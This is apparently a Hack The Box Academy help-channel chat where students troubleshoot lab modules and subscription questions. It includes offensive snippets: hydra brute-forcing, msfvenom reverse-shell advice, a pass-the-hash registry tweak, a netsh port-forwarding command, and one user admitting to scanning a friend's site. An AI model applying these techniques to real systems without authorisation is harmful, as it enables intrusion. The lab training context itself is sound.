Resolvers.txt is purely for name server/resolving

It doesn't act as the hosts file

I did some research, but as probably looking for the wrong thing. I didn't check for how the resolver should be configured on github

It checks dns (public, /etc/hosts) if it knows what you're asking it but if it doesn't it'll just tell you "no:

It's basically a list of "hey check the dns for these specific resolvers"

I'm on the Attacking Common Services - Easy module and am having trouble getting the flag. Is the goal to use the LOAD_FILE command to view the flag or to upload a shell through MySQL to make a reverse shell?

Ok. That's interesting because my /etc/hosts always had the ip and domain in it. From the looks of it and your help, it was the resolvers.txt file. So far no errors showing up

Whatever works to read the file. I believe this is one that has 2 solutions

Yes. But it didn't have the ns. So if you specified ns.inlanefreight.htb in the resolvers file it has 0 frame of reference since its not on a public server

Ohhh, ok. I gotcha now. Thanks a bunch. I appreciate this. Understanding how it works keeps it in memory

yep using the ip tells it to directly query the IP instead of trying to look through other files for references

🫡

Hey guys just a quick question. I don't have a subscription on Academy anymore, if I bought some cubes and unlocked a module, would I still get access to the VMs and all? In other word, I'm only interested in a couple of modules so paying for the subscription doesn't seem worth it

I mean the subscription is still far cheaper than buying the cubes outright

• the cubes from the subscription are yours forever
• the modules unlocked via cubes are yours forever

the in-browser vm is accessible irregardless of a subscription, if you spent any money or previously had a subscription then you're not limited to the 1/day spawn of it. But it's in-general better to set up your own vm

are modules time-limited if unlocked with cubes? Say, a module i'm interested in costs 500 cubes ($50), i can't see how a subscription would be better

no

look up the pricing and how much you get for a platinum sub vs the price of 1000 cubes

even gold monthly (500 cubes) is $38 while 500 cubes outright is $50

oh i see what you mean

ye

so I could just do 1 month of sub to get the 500 cubes

it's not so much a QOL thing you get from the sub, it's LITERALLY cheaper

yep

and once unlocked it stays yeah? Once the sub is cancelled I still get access to the module yes?

yes

you can unlock a module with cubes, not touch it for months/years and it still be sitting there

awesome, thanks so much for confirming!

what tier 3 modules are you looking to get?

the NTLM relay one

good choice

That seems weird to have this many different subscriptions and cubes sold directly for more though

it is, we just ignore the direct purchase lol

I'm using SELECT LOAD_FILE('C:\Users\admin\Desktop\flag.txt'); and am getting a NULL result. Is the path wrong or am I trying the wrong thing?

administrator

:)

windows uses the full word

only time i'd advocate for direct purchase is for the smaller amounts if you just need that tiny bit more

but aside from that monthly subs far outweigh the other options

(and the $8/m student sub is one of the best values if you have a student email)

honestly even then it's not worth it, if you upgrade your monthly sub you get the difference in cubes right away

if you're already on plat then it's gg

that's the only situation

Thanks. I used that and added \ instead of .

but i'm just purely speaking hypothetically

wish i was! Thanks again for the tips 👌

Almost done with the silver annual, 5 modules left to finish. Are there any two tier 3 or one tier 4 that anyone thinks is a must do?

actually one last question, can you cancel the subscription as soon as you got the cubes? (before unlocking any module)

Yes

stuck on password attacks - protected archives. I was able to crack the notes.zip but the question at the bottom doesnt accept the contents as the answer

unless what i cracked is a password to open the the zip file

yeah that was it..

for AD, kerberos and ADCS

Can someone tell me if it's possible to setup your very own VPN or Proxy on Linux destros.

yes

hello, i had a problem here, basically i had to start kali box with this comand ssh kali@10.129.204.151, but always i had that answer ssh: connect to host 10.129.204.151 port 22: Connection refused
, how i can fix it ?

is 22 open on that device?

i didn't know how too see it, i am very beginner also, this is the steps they said i have to follow

but, basically i just get refused

u sure the password is kali?

scan the host with nmap

also sometimes you gotta wait a few minutes after starting the target

yea, i had no problem for start for exemple the windows machine, with RDP command, just for got kali i had issue

i didn't know, i just normally follow the steps they gave us to do, and normally no problem, but that i had a problem, always refuse me

this is the question i have to answer, but without follow the steps i cant answer it

i have to acess kali for possible to use jack the ripper for broken hash criptografic for got my password

read just above the question: it's asking you to rdp

also evidenced by the 3389 being open: you're being tasked to initially rdp as bob

yes i am here, i already did the RDP

but, i cant start the kali with have the tool i need for find my answer

i close everthing, i start again, still have this answer

the question tells you that you need to use RDP

if the port for SSH is not open (nor running) you cannot SSH into the target

why do you need to SSH for this question? Isn't the question just asking you to kerberoast from that Windows host?

can dm you ? sorry for ask it at this time

sure I can't promise I'll be able to solve your issue, I don't pretend to be an expert but I'll give it a shot

really thanks

Hello,
the Connection is really is unstable here on my location. and the RDP is not works good.
i am thinking to run my c2 or just using Metasploit to connect over Powershell. is that allowed ? or there is some defender enabled will block my connection ?
did anyone try it before?
thanx

bash-3.2$ xfreerdp /v:10.129.110.241 /u:htb-student /p:HTB_@cademy_stdnt\!
[17:01:15:392] [1881:6d4c7000] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
bash-3.2$ xfreerdp /v:10.129.110.241 /u:htb-student /p:HTB_@cademy_stdnt\!
[17:01:17:304] [1885:6d94b000] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
bash-3.2$ xfreerdp /v:10.129.110.241 /u:htb-student /p:HTB_@cademy_stdnt\!
[17:01:19:047] [1888:6cecb000] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
bash-3.2$ xfreerdp /v:10.129.110.241 /u:htb-student /p:HTB_@cademy_stdnt\!
[17:01:21:635] [1891:6f373000] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
bash-3.2$ nmap -p3389 10.129.110.241
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-19 17:01 WIB
Nmap scan report for 10.129.110.241
Host is up (0.22s latency).

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 11.52 seconds

I believe this error is expected right? Because the target server is very old (Server 2008). Is there any way to connect to this server using xfreerdp? (Im currently learning Windows PrivEsc module https://academy.hackthebox.com/module/67/section/912)

I'm having an issue with the last question of the Windows CMD line module. Question:
What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.

Output:

Message
-------
An account failed to log on....
An account failed to log on....
An account failed to log on....
An account failed to log on....
An account failed to log on....
An account failed to log on....

How do I expand the message?

nvm solved

Hello guys... Do you experience disconnection issues?

Yes

I see

Hello

Just out of curiosity, on the linux OS fundamentals, when I did "locate **.log | wc -l" * I got 24 as the result, but when I used "find / -name *.log 2>/dev/null | wc -l" I got 32. What caused this discrepancy?

find searches the file system in real-time
locate uses a pre-built index of file paths on the system, typically updated by the updatedb command.

Hi guys I'm on the [Code Analysis] part of INTRODUCTION TO MALWARE ANALYSIS

I've got the second question right, but not the first one, where could I start ? Looking for every function?

"IDA to analyze orange.exe. Enter the registry key that it modifies for persistence as your answer. Answer format: SOFTWARE____"

Hi, i am in "introduction to network analysis" and there is so many errors for the response... According to their solutions document, good response is 43 804 and 80 but at this question "What are the client and server port numbers used in first full TCP three-way handshake? (low number first then high number)" my response is "80 43804" and it is not good, please can you help me ?

Is there any support to report these inconsistencies ?

where do you see a solution document?

Just completed the AD attacks and enumeration module, finally! Hardest module I’ve done so far

nice, thats a big hurdle

Nice, I think Malware Analysis is harder tbh it is breaking my head

Search through the different subroutines 😄

If you could not find it in the strings, maybe it is generated elsewhere 👀

Need a little help in file transfer
want to transfer a file from rdp seesion to pwn box but scp always say time out

Getting really really frustrated

Are you sure there's ssh here?

i think so

For this simple thing stuck here for long can 't even complete the section

have anyone done Introduction to C#

Declare a byte variable aByte and assign it the maximum value that a byte can hold. (from Understanding Variables, Constants, and Data Types in C#)

Interesting, I was thinking dacl attacks, and advanced sql injection

I do not know why that 255 is incorrect...

did you solve it?

No, didn't find any help so i went on to another module. I understand what the lesson is about but not what i have to do for the questions, maybe just my bad English.

nvm I will try to ask bard or chatgpt for that

Tried the same. Nothing was the correct answer

Hello guys, I'm solving the module about windows event logs, have anyone got any idea about the first question?

PayloadBunny solved it... still waiting for his answer lol

Let me know in my DM, thanks! 🙂

Is it „byte.MaxValue“?

Is that the full question even? Sounds like something is missing

yes that is the full question. And I have no idea with that even I have read the module

Oh I guess the answer is the line of code?

Hey, is HTB having server issues? I'm trying to complete boxes on the CPTS Job role path and the lag is horrible. I'm in UK and tried every VPN server with the same lag issues

byte aByte = byte.MaxValue;

you are right

that is the answer

Thanks! Still wondering why the question is asked like this.

Hello can I DM anyone about Skills Assessment - File Inclusion

Hey guys, I'm struggling a bit about the xss Phishing section

any1 else get really slow VPN connection? (Have tried changing VPN+protocol and reseting target).

It looks normal for me perper

Ok thanks. Must be something with my VM...

Did you try to resetting you openvpn file ?

Sometimes it worked for me

It is slow and dropping for me

Ok good to know. Though it was my (kali) VM

hey guys

need help i wanted to try the HTB CTFs i see an event running but its asking for an invite code !!

Wrong channel

For a part of a module you can download on zip folder which containe a file called solution.md and one question is exactly the same,

and event their response doesn't work...

Have you tried to replicate the steps? I remember solving this task without any problems

ahh my bad can you help me navigate to the right one ?

Well if you're specifically talking about the apocalypse ctf #1204440084867325982

Otherwise: if it requires a key, its private

To connect to the internal network on the machine, I type the following command: (just like what was in this ligolo instruction link):

https://4pfsec.com/ligolo#heading-adding-a-new-route-on-proxy-server

listener_add --addr 0.0.0.0:11601 --to 172.16.6.100:11601 --tcp
listener_list

I then typed './agent.exe -connect 172.16.6.100:11601 -ignore-cert'

But it doesn't give me the option to choose that internal address.

Why is that?
https://academy.hackthebox.com/module/143/section/1278

ahh i seee

https://ctf.hackthebox.com/event/details/hack-the-box-exhibition-ctf-56

i was talking about this one

It's private

Meaning invite only

That part is for double pivot, are you already double pivoting or are you just breaking into the internal network?

yep thankyou for helping me with my questions

Read #welcome and #rules btw

I thought what I was doing was double pivoting and I thought double pivoting was my way of breaking into the internal network

@fathom pendant Good morning, Checking in on the Attack DNS Seems like one sub domain popped up on the "subbrute" command. Been about an hour. That one doesn't work for the axfr. Is this supposed to take hours?

Your listener_add is incorrect

A normal pivot allows you to access the first network (that you usually can’t access). Now if this first network has a computer in it that has a second network linked to it, then you would double pivot

Yes I did it, look the question is "What are the client and server port numbers used in first full TCP three-way handshake? (low number first then high number)" and the solution from the mdfil they give is What are the client and server port numbers used in first full TCP three-way handshake? client: 43804 server: 80 I checked by myself and I found 80 and 43803 too

So my answer is 80 43804

but it is wrong and i don't know why

It starts with h

Also make sure your target didn't die

The first full tcp handshake is the one that has syn, syn ack and ack events, does 43804 have all three events?

Yes. I got the h one already but the axfr doesn't seem to work Syntax:
dig axfr @h.... inlanefreight.htb

because that's the incorrect syntax

the @ is calling the nameserver in dig

if your system doesn't know what h*.inlanefreight.htb it doesn't resolve it

it would be dig axfr h* @ip

Wow, thanks. That did it. I'm going to go back and review the dns portion again. Something simple took too long

that's not so much dns, as it is you not using a tool properly

think of dig this way: you are digging for records OF a domain @ the nameserver

Can someone help break down the command "curl https://www.inlanefreight.com | tr " " "\n" | cut -d"'" -f2 | cut -d'"' -f2 | grep www.inlanefreight.com | sort -u | wc -l" and help me understand how exactly this counts unique paths? I don't fully understand the delimiters in particular.

look up what each command does

I know what they all do individually

But not how this combination achieves the desired outcome

I'm no command line wizard, but I would ask chatgpt and it can give you a step by step breakdown

it takes the curl result: cuts out everything that isn't in the specified area that's being filtered for then looks for a specific string, it then sorts by unique and counts them

That's a good call. I forgot about chat gpt

do it one part at a time if you're really having issues

You were completely right, I hadn't noticed that port 43804 had rejected and that it was port 43806 which accepted first but suddenly, hack the box deliberately put a bad answer in their document?

or it was to get you to look for specific things

¯_(ツ)_/¯

you think ?

I thought they didn't see the connection has been rejecyted

🫡 Gotcha. THanks a lot. Makes better sense now

I changed the listener command too "listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
listener_list
" but its still not showing three options:

(the option that includes 172.16.6.100).

select the #1 session, check the ifconfig of that session

does that include the related subnet you're trying to access

not here read #rules

2FA doesn't mean anything if they have your token

best option: reset all passwords, 2FA, everything

What rule?

we don't help with account recovery or anything of that nature

Oh okay

I'm sorry

this channel is also for help with htb academy modules

not for rando "I got hacked" stuff

reading a server's #welcome channel is a good way to see what it's about

Yes ma'am. .

did you also create a route on your system?

ip route

if you can't ping 172.16.x.x , you should create new interface then route it to the subnet

then start the session from ligolo

Yep. I typed . Though I typed'sudo ip route add 172.16.6.100/32 dev ligolo' and not 'sudo ip route add 172.16.6.100/16 dev ligolo' because I kept getting a 'device length' error.

that's not how it works

why you add .100/32 ?

^

you should route the whole subnet

maybe this 172.16.0.0/16

the .100/32 is an incredibly more limited network (in fact one could say that it is fully limited)

I mean he already can reach this host , so it's useless

Honestly because thats the only network subnet that would work for me ...not because I entirely understood what I was doing

that's not a subnet anyway

try this ?

/32 means the subnet mask is filled

you can do 172.16.6.0/16

that would technically be the right thing

i don't believe it will work

it will

@cedar void you should read this https://academy.hackthebox.com/module/details/34

try /24

24 yeah it will work

or i did it right when i was doing it and didn't realize lol

but that may have been subconsciously knowing how CIDR addressing works

So I typed IP route and I got only two results back I think for the 172.x.x.x subnet: I got three results back when I use the subnet /24

you still can't ping the 172.16.x.x network ?

hey quick question, are the labs and vpn connection on the academy soooo slow for everyone? or just me?

like REALLY SLOW

Yes its really slow. Only one line has shown in the screen shot and its been several minutes

thats "no connection at all" not slow 🙂 💔

go to ligolo and start the session

my problem even when i ssh into a box, it is sooo laggy and slow when using the terminal

can anyone confirm me on that? i wanna know if its my problem and if i should do smth or what 😅

I am on eu-academy-2 , and there's no lag

i tried the two eu servers

appearntly my side it is 🙂 💔

It shows start is already in session

btw new ligolo-ng syntax is different compare to old version, I forgot what is it but you need to add a tun something command

I got the exact same issue. Tried all servers but nothing works

are you talking about when you do the sudo ip route command?

name of the movie lol

Hackers is so great. The Net with Sandra Bullock is underrated too

what you see has nothing to do with hacking

I did nmap nmap 176.16.6.100 and nmap 176.16.0.0 and could not get any connection

If you can't reach them , how tf you will scan them

you did something wrong just try again

I didn't check 176.16.0.0 and restarted the session by that point and tried with an nmap...geezus

it works ?

IT still do not work so I will just try again

Hello, on the Broken Auth Skills assessment I have having issues privilege escalating. I keep getting "User cannot have requested role". Ive been trying to drop the cookie after authentication and then refreshing. Have also tried setting the cookie before I authenticate.

Im attempting to password spray the admin users I found

Hey @molten prawn do u want to see what I tried

sure

show me what you tried and imma tell you if you are on the right path

@shut wraith

Alright once my internet is back up I will show u

how are you sending these messages then

No spoiling the labs please . Just dm me

i think i found a broken module in Web Attacks > IDOR in Insecure APIs. the server has a index.php page that is using jquery, but doesnt have jquery loaded. i have tried resetting to a new server but the same issue. the issue occurs when trying to click the 'Update profile' button, its supposed to call updateProfile function in script.js but script.js is full of 'ReferenceError' errors since it doesnt know what the $ symbol is without jquery.

I finished this module last week, without any trouble.

not sure why i cant click the button

did you manage to solve it somehow?

How do avoid "to many request" while using gobuster?

ayoooo whats happening

i dont really understand what im suppose to do in the WEB SERVICE & API ATTACKS module what is that vpn connection file shit?

had the same issue a while ago, restarting the target machine did it for me

try restarting the the target

could you address the issue ?

whats the problem ?

bros getting hit by dat magnetic storm ig

https://tenor.com/view/ghost-cod-staring-car-meme-gif-27095166

what?

nth nth bro 😂

im just still suffering here w connection for some reason

its fine

My RDP keeps dropping 😭

what could possibly cause this

wait huh, you too have the same profile 😂

wdym?

you and lolz

lmao

litterlaly same profile 😂

bro got bamboozled

frrrr 😂

thats my alt fam

omg 😂

can you guess what 3301 represents....?

lemme think a bit

heres a joker, its puzzles, advanced cryptography and insane logic in order to solve em

cicada

LETS GO

CICADA 3301🔛🔝

yep

lets solve it

test

omg thats not forbidden

sure 😂

do you see the bigger heading letters to?

yeah

thats nice

typical, thats MD (mark down)

different symbols represent different ways to showcase the text

ik but most servers dont allow the use of big headings

ohhh, weird

Hi guys, im doing a soc analyzing a phishing email and I need help with something, if I can send a message with more details let me know.

For those who have finished "Introduction to Digital Forensics" , what's the proper way of using Velociraptor to get the IP of the C2? I ended up getting it using other tool because I couldn't figure how to do it with velociraptor

stuck on password attacks lab - medium, found a docx file thats protected, ran office2john on it and grabed the password to the file. However is there a way to open the file w the pw? nano, cat and vi dont prompt me to enter the pw. is there a missing flag to either of those commands?

I believe what I did was I just opened it up in Google docs so I can enter the password, not sure if there was a way to do it from the command line but Google docs worked for me

just tried that myself however it stays stuck in loading.. some research says google docs doesnt support password protected documents

you could try opening it in libreoffice

Huh weird I had no issue with using Google docs

i dont think libreoffice is loaded onto the pwnbox

Yeah LibreOffice or O365 should have no issues opening it either

Yeah I just checked I even still have that document on my Google drive so I definitely used Google docs for it

weird okay let me try that again

So just to confirm you got the hash from office2john and then cracked it? If you have the clear text password I can't imagine why any word processor application wouldn't open the document

yeah exactly

still trying to open it on google docs, file just gets stuck on the upload at 9kb

Yeah then just try different applications that can open that format eventually you'll get it to open

Hey guys, how can i move to a folder after performing a ExtraSids attack, need the flag located under "c:\ExtraSids". Using the following command "ls \academy-ea-dc01.inlanefreight.local\c$" returns he content of C drive, but when i attempt something like "ls \academy-ea-dc01.inlanefreight.local\c:\ExtraSids$" it return an error saying it doesnt exist SOLVED

hi! How do i connect a compromised windows to a payload windows meterpeter reverse tcp session?

Have you set the LHOST? I think that's what I always forget to do.

ditched pwnbox and loaded up my personal VM with libre.. got into the docx file, thanks

Does subbrute always look like it's hanging? Or is it actually hanging? It didn't do anything after I hit enter. The strong silent type perhaps?

You mean you compromised it manually and now want to connect to meterpreter afterwards?

what module is that?

thanks yeah had to restart the vm not the server

ur welcome

its windows priv escalation

assessment 1. I was able to foothold woth reverse shell

now i want to escalate it to meterpreter session wwith msfconsole

is there any suggestion how to do it?

exactly

i did

It shouldn't hang. Sometimes it takes a minute to go through

use msfvenom to create a meterpreter binary that calls to your listener and transfer that over to the compromised machine

Is this the only way?

I think metasploit has the upgrade option, but it doesn't always work

do you already have a shell in msf?

No i have it with nc

then yeah to get a meterpreter shell you need to use the msf handler

Thank you fpr your help im gonna try it

Thanks! I'll look into it

can anyone tell me why I get this error when trying to run ssh2john?

python3 /usr/share/john/ssh2john.py id_rsa > rsa.hash
Traceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'

try with python2/2.7

^

A lot of the 2john tools were written in python2

that worked, had to install python2 on my vm

Hmm.. How can i avoid "out of 12 dropped probes since last increase."? while using nmap. Scanning an text file with ips~

would -Pn help there?

Used in flags :3

proxychains -sS -Pn -v -A -sC -iL 😒

Any hints would be great

What module is this for?

On Windows Priv Esc > Windows Server - trying to get the reverse shell running Metasploit.

But get the the following error on target

any ideas?

hello im stuck on passwords attakcs module in Network services section

not stuck but i found the rdp username and password

but i get error back when i try to xfreerdp

Are you sure that's the right user/password?

Each answer in this section is unique

yes i basically did all the others questions

but lemme double check

@fathom pendant None tbh.. Just went with gobuster gobuster dns -d "" -w ~/wordlists/subdomains.txt -i on a friends homepage ;p then tryes proxychains nmap etc :3.. Forgot might not ask here ^_^ I Apolgize.

This channel is for assistance with academy modules not personal stuff

#rules and #welcome <-- read

strange i tried the same combination and i got the rdp session but i get this error

I've never seen that tbh

@fathom pendant Ayeh i forgot! Thas why i said sorry mate 🙂

that's a linux host isn't it, I don't think you're supposed to use rdp

anyone can help me with skills assessments 2 - attacking common applications

how should i log in with rdp credentials then?

Technically a linux host can use rdp, see also: shells and payloads: live engagement

yeah ik, there are some modules where you're not supposed to rdp into the linux jump host

right they did ask you to login, the error looks like wrong creds

nvm i got it

i was putting right creds but wrong IP omg

lmao

<@&861185840277487616>

GONZO

BOOYAAAAA

Domain expansion: proper use of power

Ryoiki Tenkai!

skill issue indeed

figured so from the moment i saw an error screen no one has ever seen

I didn't get to ping >:[ shakes fist at cloud

what happened ?

Someone being a dumbass

not unusual

I tried doing this exercise on my virtual box and when I ping the 172.16.x.x internal address there is still no connection tested.

sudo ip route add 172.16.0.0/16 dev ligolo

ip route

well I'm doing the web services and api module and i got no clue what is the VPN connection file or how to use it

you shouldn’t be doing that module

are there other modules that explain that before?

i suggest you do the infosec foundations path before moving on

because there is no particular order from what i see

alright thanks

I suggest looking at the "setting up" module

If you want a structured path, there's the skill paths and job role paths

good to know i was trying to find an order for the cbbh path😅

thanks

Click cbbh job role path > enroll

It will give you a list of modules in order

yeah i saw that thanks

You just need to send me feet pics, afterwards you should see the path on the academy

Why are you gross

wdym

Asking for feet pics

I mean its the requisite to achieve the path

i dont decide yk

It isn't, and you're just being weird

where's the ban

lmao

Pspsps @solid python

why would CME work against SMB on a target while failing with hydra?

Because hydra silly sometimes

they likely do something slightly different behind the scenes ¯_(ツ)_/¯

what's with the spam today lol

The fact is that i find CME very slow, isnt there any param to speed it up?

the target is probably domain joined? hydray default to local auth

There it is

<@&861185840277487616>

Bruh

chill bro

you were answering me?

most likely inlanefreight domain .. is there a way to change smb usage?

I was talking about the dumbass being racist

that was.. unexpected lol

I think hydra has a domain flag

big yikes

smb2://<target>/workgroup:{<domain>}

there is but I don't think it's documented anywhere, need to read the soourcecode to find out https://github.com/vanhauser-thc/thc-hydra/blob/8c4165a83bc3126dd727244e0b5466c1a18aa67c/hydra-smb2.c#L229

I dont think smb2 was fully implemented yet

For hydra*

it still works I think

Yeah I just mean it's not "reliable"

Allegedly

I thought I'd copy the results so far from subbrute before the Pwnbox or target inevitably dropped. Pressed CTRL + C by accident and closed it. Light a candle for me

I waited so long

why not use something much faster like ffuf or gobustr

If you were my teacher rather than this vague page then maybe I would

😄

Subbrute is the tool recommended by the section

ah, unlucky

Indeed

it should only take a few minutes ¯_(ツ)_/¯

At least I know what a resolver is now...I think

I know what it's not

should i really wait for eternity to get ssh password in Password mutations section of the Passwords Attacks module 😦

Don't attack ssh

im attacking ftp rn

but its still taking a long time lol

Increasing threads can help too

i will try that rn

nvm i just got the password

Just start complaining and it works

anywho, whats the best -t argument to use with CME

so true

it already defaults to 100, it's not really gonna make much of a difference even if you set it higher

netexec simply isn't designed to be a bruteforce tool

damn i was hoping there was a way to speed this up lol

If it's taking too long: it's likely the wrong list

Most stuff should happen within 10-20 minutes

less JJK more pentesting

it shouldnt be the wrong list, its a mutated pw list from the resources

password attacks module

Size of list?

how do i get that?

we are all doing password cracking wtf

wc -l

I'm not

94044

Also bruteforcing is not password cracking

its by far the most time consuming one lol

That's the right size

So at this point: patience

i think PE/AD will be the longest ones

yeah looks that way @fathom pendant im curious how often ill have to bruteforce on the actual exam

Personally with cme I'll pipe to grep and do grep -v [-]

It's in the course, so it's on the exam

i just hope i dont spend days on that lmao knowing me, its how ill fail using the wrong damn list

im having the same problem rn, did you change anything or you just waited

patience

As I said, I end up using an inverse grep to only show me the positive output instead of all the fails (after first verifying my method is right)

-.-

ill definitely give that a go, thanks! always helpful

Don't be gross

so how does everyone like to pass time while you wait for a successful bruteforce attempt?

Just button mashed my way to the attacking DNS flag

HELP!

I am stuck in the Intrusion Detection With Splunk (Real-world Scenario) section. This question has been bugging me for days:

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: _.exe

I tried to filter for EventCode 4688 and clr.dll but got no results. I tried to filter with Update.exe but it was of no use. I am literally stuck here and would like to know what are the steps to be taken in order to find the process.

yes i changed ssh with ftp , still took a long time

you can get more hints to speed up the process by checking forums HTB, its actually helps

lmaoo

trying the marcielee suggestion with CME '| grep -v [-]' , worked pretty nicely just not used to not having all the feedback constently

I dont see the problem bc the program by default stops himself After find the valid creds

I honestly do that so that if i'm trying multiple users I don't miss it/have to scroll up a ton to find it

this last lab is killing me.. pw attacks lab - hard.. i found a .kdbx file that im trying to download to my attack host using evil-winrm.Evil-WinRM PS C:\Users\johanna\Documents> download <file>.kdbx /home/<file>.kdbx

download failed

I don't remember off the top of my head but I feel like download should be at the hitting of the command maybe

what do you mean?

Oh nvm I misread the command my bad. In any case, try to specify the absolute path of the file you want to download and the absolute path of the destination, it's probably just a syntax issue

For example,

download C:\Users\johanna\Documents\file_name.kdbx /home/file_name.kdbx

dude... ugh .. i was missing an 's' in the file name

😂 happens to me all the time

maybe its time for a break

so i have this question , why not just extract the sam & lsa secrets remotely with crackmapexec instead of copying the 5 hives to our attack machine..

remotely seems a lot faster and easier?

i think htb just shows you different methods

hmm

i see, but i believe there must be some advantage in that method over the remote one idk

or maybe just an alternative

Just different ways of doing a similar thing

hello there, to Moderator, the lab Windows Server from WPE is not working, looks is something related with the certificate

i see, thank you :3

Contact support regarding this.

ok., I will

i need extra practive with Bash Scripting does anyone have any refereences ?

https://overthewire.org/wargames/

Stuck on WINDOWS PRIVILEGE ESCALATION:Pillaging
Question: Log in as Grace and find the cookies for the slacktestapp.com website. Use the cookie to log in into slacktestapp.com from a browser within the RDP session and submit the flag.

Need to transfer the file from rdp to pwnbox but ohh... this is just not happaning..
Can anyone help..?

why do you need to transfer it from rdp to pwnbox?

the question tells you to use a browser in the rdp session

(also xfreerdp has the /drive: option)

Trying to answer the following but having no luck, anyone able to provide some insight?

there's more info that rpc may not give you

they're part of multiple groups

so im better off looking outside of rpcclient?

yes

i believe you should be able to rdp into that device

didnt think i'd be able to due to it being wone of the weird SSH into a parrotsec box or w/e it is

What module is it?

Kerberoasting - from Linux in the AD enumeration and attacks

I don't quite recall but there's stuff on that section that should tell you how to get more info

rpc is very basic

ight i'll keep looking thanks, having to use thes shells vs normal machine is frustrating lol

Actually I need to extract cookie from the file and for that i need to do this from the picture 👆
Then I need to use this [2]
That's why thinking of that

Anyways trying the way you mentioned

hey folks running through the attacking enterprise network module and am hittling [-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
anyone have an idea on how to get passed this i tried rdate but theres no time port on the dc cant procedde here

try ntpdate, make sure you're targeting the right ip

proxychains sudo ntpdate -u 172.16.8.0 && date
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
ntpdig: no eligible servers

tried with the target ip and all ips that are up and get this error

not able to grab the hash i need for questions complete sol

anyone have any tips to transfer from a internal network out to the attacker machine?

i guess the priciple is the same its just i dont remember what powershell command to use

get a meterpreter shell or use nc im not there yet with pivoting and tunneling

you can set up a http upload server, pivot and upload, easy

are you targeting dc

yes

i have a http server running on the attacker machine

but i cant remember how to send files from windows machine with basic shell to that http server

the sever supports upload yeah? you need the psupload script if you want to do it through powershell

what way would you do it?

i dont know if not being on the same network is preventing it from working or if theres no port open for time

no, I sycn clocks through pivot all the time, never been an issue

wdym?

i disabled auto sync for vm ran the said command with the dcs ip and its still erroring out

date: Not enough valid responses received in time
rdate: Unable to get a reasonable time estimate

172.16.8.0 is not dc's ip

im tunneling through ssh

yeah im doing .3

not 0

use faketime to manually change it then

i dont know the time to fake

use nmap --script smb2-time

i got a password last changed 2022-06-01 14:32:18.194423 but i dont know dcs current time or date only have 16 mins left on box maybe itll work tomorrow or support will have something differnt to say other then change location on vpn

tried fake time with output of nmap script and changing my time zone to england neither worked tried disabling the autosync of vm but it didnt work ill have to redo the module for the 6th time good practice i guess

hydra -l marlin@inlanefreight.htb -p pws.list -f 10.129.203.12 pop3 why doesnt this work attacking common services mail

@next bronze im trying something like copy SAM //172.16.x.x:30007/share with ligolo-ng

smb always use port 445 on windows, and ligolo can't reverse forward smb traffic

Man the Web Proxies module feels like such a come down after the AD module, I've been on this same section for 2 days now just because I can't get in the groove for this

w

why]\

hey guys, I got stuck in the Active Directory Skill assessment 1. I'm trying to solve question 4 where I need to connect to MS01 and obtain a flag from it. but I don't seem to get into the system. I tried to use Enter-psssession using the credentials found for the previous question, I get the shell but I'm not able to run any commands on them, only a few commands like systeminfo, whoami works. Even cd and ls doesn't work. I don't understand what the problem is. I thought of using evilwinrm using chisel but commution through chisel is not happening at all. The question is "Submit the contents of the flag.txt file on the Administrator desktop on MS01". It would be great if someone can give me nudge on this one. Thanks

Why wont my target spawn in htb

I had a lot of frustration trying to use chisel or any other pivot/tunneling, so I instead used netsh.exe to forward the traffic to MS01 that made life a lot easier

oh thanks. I'll give it a try

||netsh interface portproxy add v4tov4 listenport=1515 listenaddress=<WEB-WIN01> connectport=3389 connectaddress=IP_of_MS01||

why doesnt my taget spawn i switched vpn but it n owork why

how do i connect to port with imap/pop3 and login?

┌─[✗]─[sam@parrot]─[~]
└──╼ $openssl s_client -connect 10.129.21.20:993 -debug -starttls imap

is just empty no prompt

This isn't the correct subnet for the IP address in interface 0?

I followed the video in the ligolo-ng github link(https://github.com/nicocha30/ligolo-ng)

|| 172.16.6.100/16

sudo ip route add 172.16.0.0/16 dev ligolo||

Check the subnet you added to the IP route List.

172.16.0.0/16 is huge, that's 172.16.0.0 - 172.16.255.255

usually for academy /24 is enough

Just going through an optional exercise

(In windows environment)
I have access to jeff user which have permissions to open cmd and powershell as Administrator
I have the hash of the Administrator.
Question: Get into Administrator RDP session
Condition: Cracking Administrator hash FAILED from all aspects

What fails:-
Trying : reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f FAILED
Trying: xfreerdp /v:IP /u:Administrator /pth: HASH_OF_ADMINISTRATOR cert:ignore FAILED

Just want to know the approach of you guyz..!!!! how you are gonna deal with this
I have very limited idea regarding this so want to broaden up..!!!!

wdym by DisableRestrictedAdmin failed

just putting failed doesn't really help if you don't include the error

Any idea why I cant connect to RDP using TCP vpn , but connect through UPD but its laggy

It gives Access: Denied

Even after opening cmd as Administrator in context of jeff

that shouldn't be possible, if you have admin rights, you can edit the registry

Hi everyone, I need help with the academy's Windows privilege escalation part.
The question asked is: "What service is listening on 0.0.0.0:21? (two words)"
I used

netstat -ano

to find the service running on port 21, and noted its PID, then used ```bash
